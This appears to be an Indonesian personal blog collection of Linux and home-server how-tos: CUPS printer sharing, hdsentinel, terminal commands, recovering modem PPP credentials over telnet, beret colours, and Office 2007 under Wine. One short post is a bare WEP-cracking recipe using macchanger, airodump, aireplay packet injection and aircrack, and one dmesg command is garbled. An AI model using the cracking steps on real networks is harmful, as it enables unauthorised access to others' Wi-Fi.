membangun home server: installasi CUPS

Installasi printer via terminal di ubuntu server sangat berbelit-belit, tapi CUPS membuat segalanya jadi sederhana. CUPS sendiri adalah aplikasi printer server, dan enaknya adalah CUPS punya antarmuka berbasis web. Begini cara installnya.

1. installasi cups

sudo apt-get install cups

2. tambahkan user ke grup lpadmin, atau gunakan sudo atau login root saat mengadministrasikan printer via antarmuka webnya CUPS.

sudo usermod -a -G lpadmin [nama_user]

3. edit config cups sebagai berikut:

sudo vi /etc/cups/cupsd.conf

a. bila digunakan di headless server, ganti ‘Listen localhost:631’ menjadi ‘Listen *:631.’
b. Pada tag2 , dan , tambahkan baris ‘Allow all’ atau ganti dengan subnet anda ‘Allow 192.168.1.*’
c. hasil akhir config

Listen *:631
<Location />
Order allow,deny
Allow 192.168.1.*
</Location>
<Location /printers>
Order allow,deny
Allow 192.168.1.*
</Location>
# Restrict access to the admin pages...
<Location /admin>
Order allow,deny
Allow 192.168.1.*
</Location>

4. restart cups

sudo /etc/init.d/cups restart

atau

sudo service cups restart

5.tambahkan printer baru serta jangan lupa men-share melalui antar muka webnya

https://ip_server_printer:631/admin

cheers.

Tulisan ini adalah bagian dari tulisan berseri dengan judul membangun home server sendiri.

membangun home server sendiri (pembukaan)

Seluruh post dengan sub judul “membuat home server sendiri” adalah guide untuk membangun home server anda.
Secara umum guide ini akan terdiri dari langkah-langkah dari mempersiapkan hardware, software sampai langkah-langkah lain sehingga anda bisa membangun home server sendiri dengan ubuntu server sebagai operating system yang akan berfungsi sebagai file server, media server, torrent box bahkan web server.

Mengapa ?
Karena saya ga ada hobi lain. Selain itu:

  • file server/media server: file/media server memusatkan penyimpanan anda. Sehingga tidak setiap PC, laptop, galaxy tab, HTPC, PS3 dan xbox masing-masing menyimpan episode game of thrones terbaru, namun semuanya berbagi pakai.
  • Torrent box: seed bro! dedicated torrent box memberi kesempatan anda untuk memberi kembali kepada komunitas torrent dengan melakukan seeding. Karena sekaligus berfungsi sebagai file server jadi anda bisa men-download, share, seed tanpa repot memindah-mindahkan file
  • web server: bila anda berminat, anda bisa menggunakan service dinamic dns dan menjalankan web server, tidak ada lagi biaya hosting.
  • Lumayan kan?
    berikut daftar lengkap rangkaian tulisan ini (work in progress):
    1. persiapan hardware

    2. installasi operating system

    3. installasi dan konfigurasi remote access (ssh, webmin)
    3.a installasi dan konfigurasi ssh
    3.b installasi dan konfigurasi webmin

    4. installasi dan konfigurasi aplikasi berbagi-pakai server (samba, subsonic, CUPS)
    4.a installasi dan konfigurasi samba
    4.b installasi dan konfigurasi subsonic
    4.c installasi dan konfigurasi CUPS

    5. installasi lain
    5.a installasi dan konfigurasi deluge
    5.b installasi dan konfigurasi filebot
    5.c installasi dan konfigurasi apache dan mysql

    6. sambungkan dengan internet dan akses dari mana saja
    6.a installasi noip2 sebagai ddns dan port forwarding

    melihat status hard disk dengan hdsentinel

    HDD external yang tidak terdeteksi sensors atau hdtemp? Coba gunakan hdsentinel, mampu mendeteksi HDD external yang tidak terdeteksi hdtemp, bahkan yang terhubung via docking.

    1 . download hdsentinel:
    32bit:

    wget -c http://www.hdsentinel.com/hdslin/hdsentinel_008.zip 

    64bit:

    wget -c http://www.hdsentinel.com/hdslin/hdsentinel_008_x64.zip 

     

    2. buka zipnya:

    unzip hdsentinel_008_x64.zip

     

    3. pindahkan  ke /usr/local/bin untuk kemudahan access dan ganti namanya jadi smallcase semua untuk mudah mengingat

    mv HDSentinel /usr/local/bin/hdsentinel

     

    cheers.

    kumpulan perintah terminal

    Beberapa perintah terminal yang sering saya gunakan

    melakukan tail pada dmesg

    dmesg refresh: while true;dmesg -c;sleep 5;done dmesg-c;tail -f /var/log/messages
    
    watch -n [interval] : run terminal command then refresh output every [interval]
    

    turn off screen:

    xset dpms force standby
    

    see user:

    lastlog 
    
    cat /etc/passwd
    

    samba start/stop/restart:

    sudo service smbd start/stop/restart
    

    Melihat detail linux anda

    sudo lsb_release -a
    
    sudo uname -a
    

    cara mengetahui password speedy

    Modem Speedy sudah dipasang bertahun-tahun lalu dan tidak pernah diutak-atik, bila sama seperti saya, kemungkinan besar anda juga lupa password bahkan username speedy anda. Beginilah cara melihatnya.

    1. Masuk Command Prompt di menu start-program-accesories-command prompt. Atau gunakan putty, namun ganti koneksinya jangan ssh melainkan telnet (port 23)
    2. Sambungkan modem dengan komputer, bisa memakai LAN atau USB.
    3. Di jendela Command Prompt tadi, ketikkan : Telnet 192.168.1.1 lalu tekan Enter di keyboard.
    4. Jika sukses akan muncul tulisan " Login ", ketikkan password modem nya (secara default user admin password admin, kecuali sudah dirubah) lalu tekan Enter.
    5. Jika password benar, maka anda akan langsung masuk ke dalam konfigurasi modem dengan tampilan DOS ditandai dengan muncul tulisan " TP-LINK &gt; ".
    6. Untuk melihat isinya anda tinggal mengetikkan " show all " lalu Enter, cari tulisan PPP Username yang merupakan username modem anda dan PPP Password yang merupakan password modem anda.
    7. cek kebenaran password tadi di http://telkomspeedy.com/info-pemakaian-speedy
    

    *diolah dari berbagai sumber.

    start pidgin minimized on ubuntu 11.04

    The title says it all, cara memulai pidgin minimized

    1. Install the extended preference plugin

    sudo aptitude install pidgin-extprefs
    

    2.In your Pidgin click on Tools > Plugins check the extended Preferences 0.7a > Configure Plugin > check Hide buddy list at startup and close.
    3.In Plugins check the Buddy List Options > Configure Plugin > check Hide the buddy list when it is created then close.

    warna baret

    AD

    1. Baret Kostrad:Warna hijau dengan lambang Cakra Sapta Agni (Lambang Kostrad)
    2. Baret Kopassus:Warna merah dengan lambang Kopassus
    3. Baret Infanteri (Di bawah organik Pussenif atau Kodam):Warna hijau dengan lambang Pussenif
    4. Baret Kavaleri:Warna hitam dengan lambang Pussenkav
    5. Baret Artileri Pertahanan Udara:Warna cokelat dengan lambang Pussenarhanud
    6. Baret Artileri Medan:Warna cokelat dengan lambang Pussenarmed
    7. Baret Zeni:Warna abu-abu dengan lambang Ditziad
    8. Baret Perhubungan:Warna hijau dengan lambang Dithubad
    9. Baret Polisi Militer:Warna biru muda dengan lambang Pistol bersilang (berbeda dengan lambang Puspomad yang bergambar topeng gajah mada)
    10. Baret Pembekalan Angkutan:Warna biru tua dengan lambang Ditbekangad
    11. Baret Penerbang Angkatan Darat:Warna merah dengan lambang kuda bersayap

    AL

    1. Baret Marinir: Warna nila/ungu
    2. Baret Kopaska: Warna merah
    3. Komando Armada Laut barat dan timur: Warna biru tua

    AU

    1. Korps Pasukan Khas atau Korpaskhas: Warna jingga
    2. Pomau/Polisi Militer Angkatan Udara: Warna biru muda

    Polisi

    1. Samapta dan bhayangkara warnanya coklat
    2. Propam: warnanya biru, mirip dengan interpol yah?
    3. Brimob: waranya biru tua atau biru cobalt
    4. Resintel: merah
    5. Polairud: ini jarang nih, warnanya abu-abu

    sumber: wiki, kaskus, google

     

    simple aircrack WEP

    SETUP

    airmon-ng airmon-ng stop (interface) ifconfig (interface) down macchanger --mac 00:11:22:33:44:55 (interface) airmon-ng start (interface) 

    PICK NET & CAPTURE

    airodump-ng (interface) airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

    GET MORE PACKET

    aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface) aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

    CRACK A LACKIN’

    aircrack-ng -b (bssid) (file name-01.cap)</em>

    cheers.

    office 2007 on lucid

    Baru saja menginstallkan ubuntu ke salah satu temen dan karena katanya ga bisa make open office, jadi diinstallin Office 2007 deh…here goes…Mohon maaf bukan tutorial, sekedar berbagi aja.

    1. Download Wine (http://wine.budgetdedicated.com/archive/index.html), saya pakai versi 1.1.24, dan ga tau kenapa versi terbarunya malah ga bisa.

    2. Jalankan installasi Office 2007, Run setup.exe via wine (right click-run with wine)
    ps. no. 2, pertama saya coba jalankan setup via USB> tidak bisa, via directory windows lama yang masih ntfs > tidak bisa, kopikan filesnya ke desktop ubuntu > baru bisa. Lagi2 saya tidak tahu kenapa, silahkan trial and error aja.

    3. Install dlls, fonts dan lain-lain yang dibutuhkan officenya.
    3.a winetricks :

    sudo wget www.kegel.com/wine/winetricks
    

    3.a.1

    chmod +x ./winetricks
    

    3.b

    cabextracts sudo apt-get install cabextract
    

    3.c fonts, dlls :

    ./winetricks gdiplus riched20 riched30 msxml3 msxml4 msxml6 corefonts tahoma vb6run vcrun6 msi2
    

    4. wincfg
    terminal > wincfg > pilih tab libraries > pilih rpcrt4 > edit to native then built in

    5. saya sih abis itu direstrat, ga tau klo ga direstart piye….

    6. Voila Word 2k7 on lucid doing lorem ipsum

    Berhubung saya juga cumin coba2, klo ada kendala boleh post, tapi ga janji bisa ya. good luck.

    ps. sorry bingung mau kasih screnie apa, abis isinya terminal smua.

    pps. originally posted on oprekpc.com/forum

    cheers 🙂